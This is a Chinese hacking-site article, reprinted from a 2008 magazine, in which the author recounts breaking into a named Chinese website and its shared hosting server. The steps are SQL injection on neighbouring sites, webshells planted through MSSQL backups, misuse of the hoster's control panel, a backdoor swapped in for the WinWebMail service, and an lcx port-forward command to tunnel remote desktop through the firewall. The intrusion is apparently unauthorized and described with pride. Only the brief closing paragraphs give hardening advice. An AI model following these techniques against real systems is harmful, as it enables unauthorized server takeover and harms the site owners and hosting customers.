首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
艰难入侵“中国被黑站点统计系统”
来源:www.vfcocus.net 作者:vfocus 发布时间:2009-02-10  
本文已发表在2008-9月的《黑客手册》杂志上,版权规杂志所有,网络首发http://0kee.com/,转载请注明。

前几天无事(其实一直都没啥鸟事),上网闲逛,进了一个站叫“中国被黑站点统计系统”,收录了5W多条黑页记录,看起来很强大的样子。突然心血来潮想检测一下这个站点的安全性,经过一番努力,最后终于拿下了这个站点和整个服务器,过程中学到不少东西,入侵水平也有了提高,记录下来与大家分享下。很多图是后来截的,可能跟原过程有有点小出入,不过总体上是一样的。
首先,这种网站本身一般是不大可能有注射点什么的,功能看起来也少得可怜,意思就是说,得旁注了,查一下,服务器上有50多个站

当然,现在的虚拟主机都知道限制权限了,就算拿到旁站shell,提权不是容易的事,我的目标主要是想找个有权限的mssql注射点,这样就可以往目标网站备份了。扫一下端口,只开了21和80,看来应该是有防火墙,php的站点必须跟mysql搭配的,要不就是站库分离,要是遇到那种就太衰了。

废话少说,随便点开一个http://fdc.macheng.net.cn/ShowNews.Asp?ID=3226,后面加个and 1=1,弹个框框出来:

参数错误

即将返回主页

Http://www.macheng.net.cn

根据我的经验,这种弹框框的多半是通用防注的形式,很多时候可以cookie注射的。cookie注射大家都会吧,这里我就不手动了,太麻烦,我用自己写的一个asp版的注射工具来搞。最终检测结果为access的数据库格式,又扫不到后台,放弃,下一个……
一番曲折后进入一个连接http://www.macheng.net.cn/ShowNews.Asp?ID=4190,and 1=1之,弹框框了,在后面随便加两个字母,报错了

Mssql的哦,我立刻来了精神,操起工具就开干。
确定可以cookie注射,最简单的方法,找到zoneh的目录直接往里备份php马。当然,这得看运气了。先列目录吧,根据经验,虚拟主机的目录至少有90%的可能性不在c盘下,那就从D盘开始列吧,现成的语句我就不写了,网上随处可查,结果如下:
啊哦,写文章的时候那个站的shell已经被发现了,sql改了权限,建不了表,也就列不了目录了。所以就没办法截图了,我凭记忆写吧
列出来D盘下有一个WebHost目录比较可疑,跟进去,最后跟到'D:\WebHost\AutoHost\wwwroot',等一等,不对吧,服务器上明明有50多个站的,看来这个目录是假的,列e盘,最后确定web根目录为e:\RuiHuoWeb\,里面有个目录叫zoneh的,ok,看来这就是目标了,列一下,呵呵,要是这样就让我列出来了这篇文章也就没有存在的价值了。空的,郁闷了,换其他站试试,列出来都是三个子目录:database、logfiles、wwwroot,看来wwwroot就是web路径,试着备份一下,提示成功,访问报No input file specified.什么意思?随便输一个不存在的名字sdsd.php,还是报这个。看来是404,备份失败。好吧,那就先拿个注射点的shell再说。猜了好多次才猜对目录,汗死了,最后终于备份成功了一个小马,传上大马,进去鸟~~

把shell拿给小帅看看,那小子进去就直接传个php,然后告诉我无法解析,我点开看看,报404,传个aspx的,也报404,作了什么特殊限制吧,后来发现删不掉了,汗~估计就是这两个文件被人家发现了。权限如我所料限得很死,除主目录外基本不能访问,serv-u等大众提权方式都不管用。(废话,要不这篇文章也没价值了)翻到sql帐号,连上sql列目录试试:

很奇怪,列其他目录正常,列zoneh的目录就出问题,报什么错误忘了,看来空间商对这个站单独作了设置,不愧是黑客站啊。只好把黑手伸向空间商的网站,看看拿到空间商的站权限会不会大点,说不定有个sa什么的在=我……嘿嘿,YY中……web路径里有个RuiHuoWeb,那这个空间商的网站应该跟RuiHuo有关,旁注查询返回的结果里找了半天,找到个www.ruihuo.net,点开果然是空间商的站点。正好web根下有个ruihuo目录,列一下,全是php文件,但是那个站明明就是asp的,看来不是这个目录。又找半天,没一个像的(汗~体力活啊)这时突然想起前面的那个'D:\WebHost\AutoHost\wwwroot',说不定空间商的网站就是那个,试着备份一个shell进去,果然……

拿下了空间商的站点,很遗憾,里面没有sa,竟然是access的库,权限跟其他站一样限得很死。看到一个admin目录,点开看看,原来是虚拟主机的控制后台,估计这个后台应该有点权限吧,于是把他的网站程序打包down下来。这时候已经很晚了,睡了,明天再来研究~~

第二天看了一下admin里面的文件,发现这个网站对服务器上的站点有很大的控制权限,于是登陆后台……可是md5破不开怎么办?都有webshell了还管什么密码,直接把验证的部分注释掉,这样就进后台了。

后台看起来很强大哦,还有注销和重启功能,不过iis用户怎么可能有权限重启呢?看了下,重启部分的代码是这么写的:
Returnvalue=reboot( Trim(request.form("webip")), Port, Guid, "reboot")
看来他们自己改写了vb里面的系统函数库啊,但是重启是需要权限的,一定有一个系统帐号用来完成这一操作,一般来说这样的信息会写在两个地方,注册表或者配置文件。如果是注册表的话,因为不知道注册表路径,所以是不能直接用asp读取的,只要服务器支持aspx,就可以用我自己写的注册表浏览器来浏览整个注册表了。因为根据我的经验,服务器一般都不大重视注册表安全的,everyone可以浏览除了sam外的绝大部分注册表路径。C:\
windows目录能跳,里面有.net的目录,说明是装了.net的,只是没有在iis里面把aspx支持开启。在“主机管理”里找到第一次进去的网站,点进去,这不有改支持脚本类型的选项吗

直接把net和php加上,刷一下刚才的aspxshell,还是404,估计是要等到iis重启才生效吧,当然我们可以现在就直接重启系统,不过那样就不低调了,嘿嘿。再往下看,这不还有个改ftp密码的地方吗。于是找到zoneh的站,直接把它的ftp密码改了,然后连ftp,密码还是不对,看来改ftp密码也得等serv-u重启才生效(表问我为什么那么确定是serv-u)。等到晚上夜深人静,我终于重启了服务器,过几分钟后网页能打开了,于是连上ftp,成功登陆,OH~YEAH,看我怎么玩死你(相信我,不会这么容易成功的)ls一下,显示一片空格,一个文件都没有,怎么可能,试着传一个呢。报什么错误不记得了,反正就是无法写入之类的。我日,ftp都写不了,太BT了吧,难道它从来都不需要更新程序什么的?相当的郁闷,最有可能的是这个目录取消了system的权限。NND,安全措施果然是一般的BT啊,难道以前被人黑过?
想起前面增加了aspx和php的解析,去试试生效了不。一点开,还是404…………
至此,入侵陷入僵局,思路彻底断掉了,我无聊的在webshell里面跳、跳、跳……跳到一个转折性的目录:C:\Documents and Settings\All Users\「开始」菜单\程序 。发现里面有个WinWebMail Server。隐约记得网上有关于winwebmail提权的传说,说这个程序的目录必须是everyone可写的。虽然不大相信,也暂且试一回吧。把winwebmail的快捷方式down下来,找到安装路径为D:\Server\Mail\WinWebMail\easymail.exe。跳转D:\Server,木权限,D:\Server\Mail\,进来鸟,嘿嘿,至少是可以读的。最后转到D:\Server\Mail\WinWebMail,试着传个文件,终于rp爆发了……

原来网上的传说是真的!ok,打起精神,来替换服务吧……不好意思,很晚了,我要先睡觉了,明天继续……
今天继续。网上去down了个winwebmail,装上查看服务启动的进程为emsvr.exe。ok,先把服务器上的emsvr.exe改个名字,然后上传个后门取名为emsvr.exe。呵呵,幸好没被杀,我对免杀可是一窍不通。没耐心等到晚上了,直接重启,几分钟之后,服务器上线,那个激动啊,经历了这么多磨难,Finally……

Ok,有systemshell就好办事了。连上去执行cacls.exe E:\RuiHuoWeb\zoneh /E /T /G system:F,即把这个目录以及子目录和文件的所有权限赋予system,返回:
处理的目录: E:\RuiHuoWeb\zoneh
处理的目录: E:\RuiHuoWeb\zoneh\database
处理的目录: E:\RuiHuoWeb\zoneh\logfiles
处理的目录: E:\RuiHuoWeb\zoneh\wwwroot
处理的目录: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262931
处理的目录: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262932
处理的目录: E:\RuiHuoWeb\zoneh\logfiles\W3SVC83154450
处理的文件: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262931\ex080315.log
处理的文件: E:\RuiHuoWeb\zoneh\logfiles\W3SVC71262932\ex080315.log
拒绝访问。
嗯,看来是所有权的问题,牵扯到
windows的安全机制,一时半会说不清楚(众人:装B了吧,不懂就直说嘛!)看来cacls这个命令还是有缺陷的,如果能在图形界面下修改权限就好了,可是ntshell是不带龟壳(众人:???我:图形用户界面,graphic user interface,简称gui,你读一下,不念“龟”念什么?后面再加个shell,合起来不就是“龟壳”?众人:。。。。。。。。。。。。。。。)的。我就不相信在system下会有做不到的事,逼我占领3389是吧。Webshell里查看,终端端口改成了9419,连了一下连不上,但是webshell里扫本地端口是开放的,看来还是防火墙作怪,木事,丢个lcx上去转发,嘿嘿,lcx转发大家比我用得熟吧?我还是第一次用哦。先建好帐号,本地输入lcx –listen 8080 2000,服务器上输入lcx.exe -slave xxx.xxx.xxx.xxx 8080 xxx.xxx.xxx.xxx 9419。然后mstsc 127.0.0.1:2000,千辛万苦之下,终于占领3389了,呼…………

二话不说改权限:

Finally……有权限写了,传个phpspy上去

不用说也知道被涂黑的是我的shell吧?废了九牛二虎之力,终于成功取得目标网站以及服务器权限,截图留恋。

最后总结下,总的来说这个虚拟主机的安全性还是不错的,空间商也很有安全意识。唯一的两个漏洞在于mssql帐号可以往任意system可写的目录下备份webshell,和winwebmail目录可写。对于第二个问题,winwebmail目录可写应该是有它的理由的。如果无法从权限上来限制就最好给安装目录取复杂的名字,同时删除快捷方式并设置注册表相应键值的权限,以免被人找到。
而第一个问题应该是普遍存在的。现在的虚拟主机空间商都越来越知道限制权限了,一般目录的权限的设得很死,可是对于mssql的logbackup攻击方式没有还是引起足够的重视。这种攻击对sql帐号权限要求不高,db_owner足以,一个mssql的注射点就可能导致服务器上所有站点的沦陷。网上关于logbackup备份来旁注攻击的文章也有不少了,可是我遇到的很多mssql注射点都是可以直接往任意目录备份的,除了一个网站删了存储过程还是怎么地,列不了目录,不过后来用其他方法取得了web路径可以直接备份。希望各空间商引起重视。
Ok废话说完了,累死了,收工!


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Hacked PHPBB(dot)COM (入侵PHP
·社会工程学——骗子,是你耍我还
·利用python特性进行提权
·网络攻防实战:由渗透扫描到实施
·网络攻防实战:老Y文章管理系统V
·一篇论文引发的入侵——记对当地
·一次完整的安全渗透测试
·修改封包拿WebShell
·利用XSS渗透DISCUZ 6.1.0实战
·php168 v2008后台拿shell方法
·使用BackTrack3破解WEP实战
·入侵某官Game
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved